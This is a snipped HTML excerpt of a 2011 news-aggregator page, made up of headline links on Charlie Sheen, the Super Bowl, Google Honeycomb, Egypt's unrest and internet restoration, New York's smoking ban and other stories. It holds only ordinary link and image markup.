<div class="aa-inner"><a href="http://www.hollywoodnews.com/2011/02/02/charlie-sheen-releases-a-thank-you-statement/" target="_blank" class="usg-AFQjCNFEdFrnRlyRBDKhmZzbmzzSxI3IQQ " id="MAA4AEgDUAJgAmoCdXM">Charlie Sheen releases a ...thank you... statement</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIwIjeSZ0EYZvZ10WjvqER7IiZzw " href="http://www.tmz.com/2011/02/02/charlie-sheen-photo-george-santo-pietro-porn-star-house-photo-porn-family-binge-drugs-alcohol-cocaine/" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHZKtoRHwa2skpQELpmyZg1c5kfzQ " href="http://www.dailymail.co.uk/tvshowbiz/article-1352924/Kacey-Jordan-Tear-stained-mug-shot-Charlie-Sheens-porn-star-girl.html?ito=feeds-newsxml" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHReIwaYx5uGT2sMrV2Q0rqyLe7VA " href="http://www.nytimes.com/2011/02/02/arts/television/02sheen.html" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEVtR467TnS1u4vzm79xZ-PQsvo2w " href="http://www.cbsnews.com/8301-504083_162-20030390-504083.html" id="MAA4AEgDUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.kansascity.com/2011/02/02/2628224/woodson-knows-super-bowl-shots.html" class="usg-AFQjCNEqSldN7cn0ke7a87XFHFDbrqC9rA " title="Kansas City Star"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/etUiVHt9rXWOCM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.kansascity.com/2011/02/02/2628224/woodson-knows-super-bowl-shots.html" class="usg-AFQjCNEqSldN7cn0ke7a87XFHFDbrqC9rA "> Kansas City... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEQX9DP0-en_LTd5cH12f6UDCKirQ " href="http://www.ajc.com/sports/nfl-alumni-hoping-for-825720.html" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=kIqpO91mwfk">Video:&nbsp;
The Green Bay Packers Do "The Raji" Dance - Teach Me How To Raji!
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.chicagotribune.com/sports/sc-spt-0203-farmer-super-bowl--20110202,0,3487122.story" target="_blank" class="usg-AFQjCNECYghHfZs8e7gun1Ejg7ON4za-Lg " id="MAA4AEgEUAFgAmoCdXM">Former Steeler from Pennsylvania at home with Packers</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFzJRORzjkDWqfqOf_EXwx2vATIUA " href="http://www.reuters.com/article/2011/02/03/us-nfl-superbowl-homeless-idUSTRE71207A20110203" id="MAA4AEgEUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHsLXDA5XU-m9mHkG7NZa7XXwbHJg " href="http://www.latimes.com/sports/snss-sn-nfl-mike-mccarthy-sbowl-story,0,2720812.story" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFjHqavI04iN0KL3Hg2EHAWne1CYg " href="http://content.usatoday.com/communities/thehuddle/post/2011/02/super-bowl-xlv-wednesday-injury-report-steelers-maurkice-pouncey-sits/1" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGBkrHzc-M4OmI1Ji2-16RSMqCcyQ " href="http://online.wsj.com/article/SB10001424052748703445904576118351939464860.html" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://news.cnet.com/8301-30684_3-20030465-265.html" class="usg-AFQjCNHQAze5aXDVjLKMifrVpwzP0P42sw " title="CNET"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/cBt4FP6TsU9HUM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://news.cnet.com/8301-30684_3-20030465-265.html" class="usg-AFQjCNHQAze5aXDVjLKMifrVpwzP0P42sw "> CNET </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEvcRbYL-p9ZjQYZ9gUA9InRHKj9g " href="http://www.pcmag.com/article2/0,2817,2379264,00.asp" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://news.cnet.com/8301-30684_3-20030465-265.html" target="_blank" class="usg-AFQjCNHQAze5aXDVjLKMifrVpwzP0P42sw " id="MAA4AEgFUAFgAmoCdXM">Google&#39;s new tablet OS: Honeycomb (FAQ)</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/2011/02/02/us-google-idUSTRE7119R120110202" target="_blank" class="usg-AFQjCNGPo0Ejl3rjoOkpwuD0b2XEPCrDtg " id="MAA4AEgFUAJgAmoCdXM">Google plays catch-up with Apple in tablets</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEG9RsGZJFW-t-McTvrBEqcUnmcGA " href="http://www.examiner.com/gadgets-in-san-jose/google-android-3-0-will-be-available-only-for-tablets" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGAKI0vjDB03CM9vceBg3zQzZz9Uw " href="http://www.latimes.com/business/la-fi-google-honeycomb-20110203,0,3670067.story" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFndaqvRNOVOrryXb_BwAy0dxJ8wg " href="http://feeds.informationweek.com/click.phdo?i=07cb20f94a84a65696c0598f4648b19e" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEQe_5PLrrFkdgcQ7ib2UZabjwBhA " href="http://www.afterdawn.com/news/article.cfm/2011/02/02/google_shows_off_android_maret_webstore" id="MAA4AEgFUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/2011/02/02/idINIndia-54604820110202" class="usg-AFQjCNH613jRI5GsNaQW6ILzYbsa9iyAig " title="Reuters"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/2hnnN_AsexG2kM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/2011/02/02/idINIndia-54604820110202" class="usg-AFQjCNH613jRI5GsNaQW6ILzYbsa9iyAig "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEWev2kjnkLnvxxwP1gVDCwllcYhg " href="http://www.tmz.com/2011/02/02/lindsay-lohan-search-warrant-jewelry-tipped-off-lapd-theft-investigation-surveillance-video-probation-violation-jewelry-store/" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=BTpTlgoHhhI">Video:&nbsp;
Lindsay Lohan, Jewelry Thief?
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cnn.com/2011/SHOWBIZ/celebrity.news.gossip/02/02/lindsay.lohan.necklace/" target="_blank" class="usg-AFQjCNEz9KELLsyY0NqU44pCITVT3fudyw " id="MAA4AEgGUAFgAmoCdXM">Lindsay Lohan connected to police probe of stolen necklace</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEFWmIq2a1Y0eWwoSmDuortT0UJXA " href="http://www.expressnightout.com/content/2011/02/lindsay_lohan_selects_glamorous_new_care.php" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHKFvl-yFR98f31HPWwRx_e7wxErA " href="http://www.hollywoodnews.com/2011/02/02/surveillance-video-of-lindsay-lohan-stealing-the-necklace/" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNESwzPJqtS_BjAGPwDt8-Cw43PCaw " href="http://www.amny.com/urbanite-1.812039/lindsay-lohan-i-didn-t-swipe-2-500-necklace-1.2656958" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGHUrji3JthaPa4f-fm4QchGerd8w " href="http://www.radaronline.com/exclusives/2011/02/photos-dad-michael-takes-bible-daughter-lindsay-brushing-ten-commandments" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/consumer/story/2011/02/02/oil-egypt.html" class="usg-AFQjCNHZSnezVKa8qnJFjNEizV6R-WiLLQ " title="CBC.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/X9hzSl8XyGu7bM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/consumer/story/2011/02/02/oil-egypt.html" class="usg-AFQjCNHZSnezVKa8qnJFjNEizV6R-WiLLQ "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGeWMgiKg8u2Y0PNeQVV1wHgqbh_w " href="http://www.businessweek.com/news/2011-02-02/oil-gains-a-second-day-as-egypt-unrest-prompts-supply-concern.html" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-02-02/persian-gulf-oil-producers-dodge-mideast-unrest-with-90-crude.html" target="_blank" class="usg-AFQjCNGJ7HHIsLP9idPxYaCFHROxa_WHkw " id="MAA4AEgHUAFgAmoCdXM">Persian Gulf Oil Producers Dodge Unrest With $90 Crude</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/2011/02/02/businesspro-us-markets-oil-idUSTRE71192R20110202" target="_blank" class="usg-AFQjCNHakc-GFim7ppNPuFsw_qKmDIODcw " id="MAA4AEgHUAJgAmoCdXM">Oil rises as worries over Egypt persist</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGTBCbQTO3m4kP1y1uKrCYDZ9Ki_Q " href="http://online.wsj.com/article/BT-CO-20110202-713123.html" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVHacohKyeLaol7JAuno2CtWkKyQ " href="http://www.nytimes.com/2011/02/03/world/middleeast/03suez.html?src=twrhp" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG0KWuC8dL86S7kclfzS0xGR2lOXg " href="http://www.forbes.com/2011/02/02/egypt-economy-middle-east-opinions-columnists-doctor-doom.html" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://mediadecoder.blogs.nytimes.com/2011/02/02/the-first-look-at-news-corp-s-the-daily/" class="usg-AFQjCNEhQVkBvR5b4Og4dZk2qbetZNmjFw " title="New York Times (blog)"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/dMwchHQThamZcM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://mediadecoder.blogs.nytimes.com/2011/02/02/the-first-look-at-news-corp-s-the-daily/" class="usg-AFQjCNEhQVkBvR5b4Og4dZk2qbetZNmjFw "> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF8e9Z0zkYD8mq7QrfvS6UdYGg8EA " href="http://www.appleinsider.com/articles/11/02/02/next_gen_ipad_with_front_facing_camera_allegedly_spotted_at_the_daily_launch.html" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=WRFeV9WY5uE">Video:&nbsp;
iPad app first look: The Daily
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/2011/02/03/us-newscorp-ipad-idUSTRE7116NK20110203" target="_blank" class="usg-AFQjCNEW8ZLsjO7pdaJANEY4k1FnlLIViw " id="MAA4AEgIUAFgAmoCdXM">News Corp bets on iPad for future of news</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYnSS_VwuzuJSyQOCxqWBrgQ467w " href="http://reviews.cnet.com/8301-1023_3-20030257-93.html" id="MAA4AEgIUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH8yvVgWZFH2y7AJpcM9XOFz7xzxQ " href="http://mashable.com/2011/02/02/the-daily-review/" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE7ENwpPmzmgoy8UdO7pPSbcXwgow " href="http://abcnews.go.com/Technology/wireStory?id=12827012" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFLZd_HC39oZru1JMItjdgDXlMgaA " href="http://techcrunch.com/2011/02/02/ipad-2-sighting-totally/" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://au.eurosport.com/basketball/nba/2009-2010/lakers-eye-up-trades_sto2648351/story.shtml" class="usg-AFQjCNFqIJeqNDfSkoQeHv7irvkUGk3ghQ " title="Eurosport.com AU"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/Egl_seZbVU_eLM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://au.eurosport.com/basketball/nba/2009-2010/lakers-eye-up-trades_sto2648351/story.shtml" class="usg-AFQjCNFqIJeqNDfSkoQeHv7irvkUGk3ghQ "> Eurosport.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFqMlM9CWXYuSXFkXhVjZNN2RDDKg " href="http://sports.espn.go.com/los-angeles/nba/news/story?id=6084287&amp;campaign=rss&amp;source=ESPNHeadlines" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://lakersblog.latimes.com/lakersblog/2011/02/ron-artest-insists-he-doesnt-want-to-be-traded.html" target="_blank" class="usg-AFQjCNFjt0Wg-WQVUZ5E8aQFQD_QoZNBXg " id="MAA4AEgJUAFgAmoCdXM">Lakers downplay Ron Artest trade story</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.hoopsworld.com/Story.asp?story_id=18653" target="_blank" class="usg-AFQjCNFLizSM6Jd8NP_sNAyOZ3EnctMTBg " id="MAA4AEgJUAJgAmoCdXM">NBA PM: Ron Wants Gone?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEWPVIQk3jFNKs-yeMoQQkUYV-92g " href="http://probasketballtalk.nbcsports.com/2011/02/02/old-man-game-is-winning-in-the-nba/" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFHLCVvAzrITyXTHjAW-vVFhoWFkA " href="http://voices.washingtonpost.com/wizardsinsider/2011/02/lakers-covet-kirk-hinrich.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHMa5akPKbRv12wLfw96YgrAA1now " href="http://www.upi.com/Sports_News/2011/02/02/Lakers-Artest-shoots-down-trade-rumors/UPI-24741296691135/" id="MAA4AEgJUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGqRUfwqztPTVZ9pGiELxUZZAi74A " href="http://nba.fanhouse.com/2011/02/02/ron-artest-reflects-on-phil-jackson-mental-health-and-more/" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/2011/02/02/us-newyork-smoking-idUSTRE71198V20110202?feedType=RSS&amp;feedName=topNews" class="usg-AFQjCNG0XdBE4hqYrnw6lUFQRoW6TzfFDw " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/mU-1I4S_TOrkuM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/2011/02/02/us-newyork-smoking-idUSTRE71198V20110202?feedType=RSS&amp;feedName=topNews" class="usg-AFQjCNG0XdBE4hqYrnw6lUFQRoW6TzfFDw "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG2ikfQy5A8vrnE0Qpn7bzj7ku8aw " href="http://www.nytimes.com/2011/02/03/nyregion/03smoking.html" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703960804576120241219637576.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNHByBGa7wjWtkY0ci29DeMGbvg5kA " id="MAA4AEgKUAFgAmoCdXM">New York Snuffs Out Smoking</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFvGm35wSyoZ6PY1nlgahtISeDFPQ " href="http://www.washingtontimes.com/news/2011/feb/2/no-smoking-in-nyc-public-places/" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG0XdBE4hqYrnw6lUFQRoW6TzfFDw " href="http://www.reuters.com/article/2011/02/02/us-newyork-smoking-idUSTRE71198V20110202?feedType=RSS&amp;feedName=topNews" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF4CCIzYFOp1ucUCAX6tKiBbQ_lvg " href="http://www.cigaraficionado.com/webfeatures/show/id/15821" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEJumAat08yWpNLFIvljlqOr7CmZw " href="http://www.dnainfo.com/20110202/manhattan/city-council-snuffs-out-smoking-parks" id="MAA4AEgKUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFfavByeO3vWjAaYUaU68Sj_6jdyg " href="http://www.reuters.com/article/2011/02/02/financial-regulation-sefs-idUKN0221406420110202" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://dealbook.nytimes.com/2011/02/02/s-e-c-proposes-new-swap-rules/?src=dlbksb" target="_blank" class="usg-AFQjCNEgWAPVHLSkoiE_tsGQR6UlicH5DQ " id="MAA4AEgLUAFgAmoCdXM">SEC Proposes New Rules</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.secondact.com/2011/02/sec-takes-one-small-step-toward-financial-planning-overhaul/" target="_blank" class="usg-AFQjCNGd-a1nwEuaZQd18nweArx8YBQFCQ " id="MAA4AEgLUAJgAmoCdXM">SEC Takes a Step Toward Financial Planning Overhaul</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG6Aqp92wa3KRhpaZMlcOTo6QL8dg " href="http://online.wsj.com/article/SB10001424052748703960804576119991559234636.html" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGoSg7GLgg2ZacRlsO3jE07h0LmSg " href="http://www.telegraph.co.uk/finance/markets/8299516/Securities-and-Exchange-Commission-to-open-up-derivatives.html" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFCbi1aGnDXi9Zu8jxaGcbPLYg9xA " href="http://www.ft.com/cms/s/0f3ef2e8-2e30-11e0-8733-00144feabdc0.html" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://pheedo.msnbc.msn.com/click.phdo?i=f6e9e151e0ceafb737cf2e0b49ad1b00" class="usg-AFQjCNHR9QrM6918uNvEM59n_MZAkzZJFA " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/cLEuCvoVI6WHiM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://pheedo.msnbc.msn.com/click.phdo?i=f6e9e151e0ceafb737cf2e0b49ad1b00" class="usg-AFQjCNHR9QrM6918uNvEM59n_MZAkzZJFA "> msnbc.com </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFaXIxXFMyaE5M_nMPOPXMc4eG6ZQ " href="http://www.cnn.com/2011/CRIME/02/02/california.school/?hpt=T2" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://pheedo.msnbc.msn.com/click.phdo?i=f6e9e151e0ceafb737cf2e0b49ad1b00" target="_blank" class="usg-AFQjCNHR9QrM6918uNvEM59n_MZAkzZJFA " id="MAA4AEgMUAFgAmoCdXM">Police: Janitor fatally shoots N. Calif. principal</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.9and10news.com/Category/Story/?id=280516&amp;cID=3" target="_blank" class="usg-AFQjCNH11zVHdYJuQNamJ3YAUQUtZwX6qQ " id="MAA4AEgMUAJgAmoCdXM">Growing violence...More jobs...Fatal school shooting</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF3u4JCMt2ZomcoegVf9zPJgvIhow " href="http://www.reuters.com/article/2011/02/02/us-school-shooting-idUSTRE71195820110202" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGJAd-e9QRrWEXmG7FtLSvaSF0bmQ " href="http://www.washingtontimes.com/news/2011/feb/2/american-scene-109623449/" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE5tipC4f0JGVgHY4RERo-95NyHhQ " href="http://www.chicagotribune.com/news/nationworld/ktxl-shooting-at-school-injures-one-20110202,0,677210.story" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt4-VO_k3d4I6kEFLlWFuNIz-PFw " href="http://www.9news.com/news/world/article.aspx?storyid=179288&amp;catid=347" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/africaandindianocean/egypt/8293551/Egypt-protests-Monday-31-January-2011-as-it-happened.html" class="usg-AFQjCNF3fPLKUJHLjf49vNVuYHccYt9kGQ " title="Telegraph.co.uk"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/6mRgy_Yhw32_cM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/africaandindianocean/egypt/8293551/Egypt-protests-Monday-31-January-2011-as-it-happened.html" class="usg-AFQjCNF3fPLKUJHLjf49vNVuYHccYt9kGQ "> Telegraph.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS6R621HblStskSoWe69sNuMt4UQ " href="http://www.latimes.com/business/la-fi-egypt-internet-20110203,0,1707404.story" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748704775604576120474247618578.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNG8SATQW4izZ19I5tWX3QwoNq0fVg " id="MAA4AEgNUAFgAmoCdXM">Facebook Sees Egypt Usage Spike</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.ft.com/cms/s/0/7bd083e6-2f1a-11e0-88ec-00144feabdc0.html" target="_blank" class="usg-AFQjCNEw-GljILW9p6fr6r9b93YZTKI2iA " id="MAA4AEgNUAJgAmoCdXM">Battle lines drawn as Egyptian rivals dig in</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEDrtj4S_OzYoIQ1Rd7Cpr1qvReaw " href="http://www.montrealgazette.com/Egypt+restores+Internet+service/4213750/story.html" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFoT0NqkMLXecg38pgKBjHyWB7SkA " href="http://www.computerworld.com/s/article/9207803/Egypt_reverses_kill_switch_to_restore_Internet_access" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGAYfjzal4Q22tF06xtlPvWOwcfPQ " href="http://voices.washingtonpost.com/posttech/2011/02/egypt_restores_internet_report.html" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEPoQg8oVotCPjn3i6idpatD6NlNw " href="http://news.cnet.com/8301-30685_3-20030335-264.html" id="MAA4AEgNUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbsnews.com/8301-504763_162-20030433-10391704.html" class="usg-AFQjCNE05NNOnvryC4p52bHkdktL1KZOUQ " title="CBS News"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/9AH6hrElHpqhuM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbsnews.com/8301-504763_162-20030433-10391704.html" class="usg-AFQjCNE05NNOnvryC4p52bHkdktL1KZOUQ "> CBS News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE05NNOnvryC4p52bHkdktL1KZOUQ " href="http://www.cbsnews.com/8301-504763_162-20030433-10391704.html" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.emaxhealth.com/1020/gene-based-test-predicts-prostate-cancer-aggressiveness" target="_blank" class="usg-AFQjCNETfOR-oycx9wv2CQMHfupq-eOZpg " id="MAA4AEgOUAFgAmoCdXM">Gene based test predicts prostate cancer aggressiveness</a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703960804576120194229203936.html" target="_blank" class="usg-AFQjCNGpHHoNBLsuhNJBwn4rKmecmoLMqQ " id="MAA4AEgOUAJgAmoCdXM">New Clues to Best Approach to Prostate Cancer</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFBhpkEfUqIKlsovF0hM9PGtDBTNA " href="http://www.courier-journal.com/article/20110202/FEATURES03/302020149/Test-may-help-guide-prostate-treatment?odyssey=tab%7Ctopnews%7Ctext%7CHome" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHGRkqVur_Rkbe_eTaKpEFoOSbwmA " href="http://www.reuters.com/article/2011/02/02/us-cancer-prostate-idUSTRE7117X520110202" id="MAA4AEgOUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGL1TQxwk2xW_zbjGQnaz1ifqT2pA " href="http://www.foxnews.com/health/2011/02/02/new-test-help-set-treatment-prostate-cancer/" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBlLEVd7LoCdeOHhqoqsK46mj3Dw " href="http://www.prnewswire.com/news-releases/metamark-genetics-announces-landmark-prostate-cancer-study-published-in-nature-115113614.html" id="MAA4AEgOUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/2011/02/02/uk-yemen-president-idUKTRE7111XD20110202" class="usg-AFQjCNE8CwtehMd-KhGCInq9Nkai5mTdGQ " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/Sa2Cdoqzx9uGMM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/2011/02/02/uk-yemen-president-idUKTRE7111XD20110202" class="usg-AFQjCNE8CwtehMd-KhGCInq9Nkai5mTdGQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEwSI_esnVtjex3EGrI_9a15YnXmQ " href="http://andrewsullivan.theatlantic.com/the_daily_dish/2011/02/yemen-politics-breakfast-burrito-edition.html" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=PatZJ03udZ4">Video:&nbsp;
Yemeni President Says He Won't Seek Another Term
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.voanews.com/english/news/middle-east/Yemeni-President-Will-Not-Seek-New-Term-115089099.html" target="_blank" class="usg-AFQjCNG2r03N9ctSaFbFcKAblOftZYnshQ " id="MAA4AEgPUAFgAmoCdXM">Yemeni President to Step Down in 2013</a>
...[SNIP]...
